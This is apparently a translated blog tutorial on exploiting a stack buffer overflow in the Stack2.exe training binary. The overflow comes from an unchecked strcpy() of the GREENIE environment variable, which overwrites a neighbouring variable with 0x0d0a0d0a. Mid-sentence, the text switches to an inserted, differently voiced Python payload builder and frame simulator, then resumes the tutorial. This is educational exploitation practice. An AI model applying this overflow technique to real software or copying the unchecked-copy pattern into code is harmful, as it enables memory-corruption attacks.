Reverse engineering PWN tasks or exploiting binary vulnerabilities (Part 3 / Stack2)

Friends, hello everyone! This is the third part of our “pwn” series 🙂 Today we will study how Stack2.exe works (you can download it HERE).

Links to previous parts:

Exploitation of binary vulnerabilities or learning to “push” (Part 1 / Stack0)

Reverse engineering PWN tasks or exploiting binary vulnerabilities (Part 2 / Stack1)

Stack2

We'll start, as usual, with static analysis. Let's launch GHIDRA:

Loading snake :)


We throw the “binary” into the project and click on Code Browser:

We analyze…

We get the decompiled code. Pay attention to the variable “local_14”. It is assigned the value of the environment variable “GREENIE”. Then comes the check. If the variable “local_14” is equivalent to 0x0 (NULL), then the program displays the message “Please set the environment variable GREENIE”:

Let's look further… The variable “local_18” is assigned “0” (this is the variable we will overwrite). The notoriously unsafe strcpy() function copies the value of “local_14” into “local_58” (an array of 64 bytes) without any length check. P.S. Sorry, the array declaration didn't make it onto the screenshot. Next comes the check. If the variable “local_18” is equal to “0xd0a0d0a”, then PWN! (we get a message that we are great and have correctly modified the variable). If not, then “Try again”:

Great! We figured out how the program works. Let's do a small test. Go to the environment variables and add the variable “GREENIE” with the value of 64 characters “A” (since the array is 64 bytes) and “BCDE” (we'll try to overwrite the variable “local_18” with these characters):

Open x64dbg and set a breakpoint on the CMP instruction (we have done this before, so we won't dwell on it). We see that the EAX register contains our “letters” BCDE:

Then everything would seem simple, but we have to “overwrite” the variable “local_18” with the bytes “\x0d”, “\x0a”, …! Those who have “fought” know that these are the CRLF control characters:

  • \x0d – the Carriage Return (CR) character, ASCII code 13.

  • \x0a – the Line Feed (LF) character, ASCII code 10.

But how do we write control characters into the value of the environment variable “GREENIE”?

I'll say right away that control characters can be written into environment variables, and now we'll write a small exploit script in Python:

Let's look at the code. Var1 is assigned a 64-character string 'A', followed by a “packed” 0x0d0a0d0a in Little-Endian (
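Since the script itself only survived as a screenshot, here is an added example (not the author's original script) that reconstructs what the text describes: 64 bytes of filler for “local_58” followed by 0x0d0a0d0a packed little-endian so that it lands in “local_18”, plus a small model of the frame that shows why an unbounded strcpy() lets the extra bytes spill into the neighbouring variable. The buffer size (64), the target value and the variable names come from the decompiled code above; the function names, the frame model and the placeholder path to Stack2.exe are assumptions made here.

```python
import os
import struct

BUFFER_SIZE = 64          # size of local_58 in Stack2.exe (from the decompiled code)
TARGET = 0x0d0a0d0a       # value the program compares local_18 against


def build_payload(buffer_size=BUFFER_SIZE, target=TARGET):
    """Bytes to place in GREENIE: filler for local_58, then the target value
    packed little-endian so it overwrites local_18 on an x86 stack."""
    return b"A" * buffer_size + struct.pack("<I", target)


def can_pass_strcpy(target):
    """strcpy() (and a C string environment variable) stop at the first NUL
    byte, so a target value containing 0x00 could never be copied whole.
    0x0d0a0d0a has no NUL byte, which is why CR/LF bytes work here."""
    return b"\x00" not in struct.pack("<I", target)


def simulate_strcpy(payload, buffer_size=BUFFER_SIZE):
    """Model of the vulnerable frame (an assumption for illustration): a
    64-byte array followed directly by the 4-byte int local_18, both zeroed.
    strcpy copies up to and including the first NUL with no length check, so
    anything beyond buffer_size spills into local_18. Returns (buffer, local_18)."""
    copied = payload.split(b"\x00", 1)[0] + b"\x00"   # strcpy stops at NUL and writes it
    frame = bytearray(buffer_size + 4)                 # local_58 + local_18
    frame[:len(copied)] = copied                       # no bounds check, as in the binary
    buf = bytes(frame[:buffer_size])
    local_18 = struct.unpack("<I", bytes(frame[buffer_size:buffer_size + 4]))[0]
    return buf, local_18


def build_environment(payload=None):
    """Copy of the current environment with GREENIE set to the payload.
    Environment values must be str, so the raw bytes are decoded as latin-1,
    which maps every byte 0x00-0xff to itself (CR and LF included)."""
    env = dict(os.environ)
    env["GREENIE"] = (payload if payload is not None else build_payload()).decode("latin-1")
    return env


if __name__ == "__main__":
    payload = build_payload()
    _, value = simulate_strcpy(payload)
    print(f"payload length: {len(payload)} bytes, tail: {payload[-4:]!r}")
    print(f"local_18 after strcpy: {value:#010x} (target {TARGET:#010x})")
    # To run against the real binary, pass the environment to the process
    # (the path below is a placeholder, not a real location):
    # import subprocess
    # subprocess.run([r"C:\path\to\Stack2.exe"], env=build_environment())
```

The model also reproduces the earlier test with “BCDE”: copying 64 “A”s plus “BCDE” leaves local_18 equal to 0x45444342, exactly the bytes seen in EAX at the CMP breakpoint. The root cause the model exposes is the missing length check: a bounded copy (for example strncpy_s() with the size of local_58, or rejecting a GREENIE longer than 63 characters before copying) would keep the extra bytes out of local_18 regardless of what the environment variable contains.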

Let's execute the script:

Profit!


We successfully exploited the unsafe strcpy() function and got the coveted string! P.S. We even wrote an exploit 🙂

If you liked the article – thumbs up! Also subscribe to my TG!

See you in the next part! 🙂
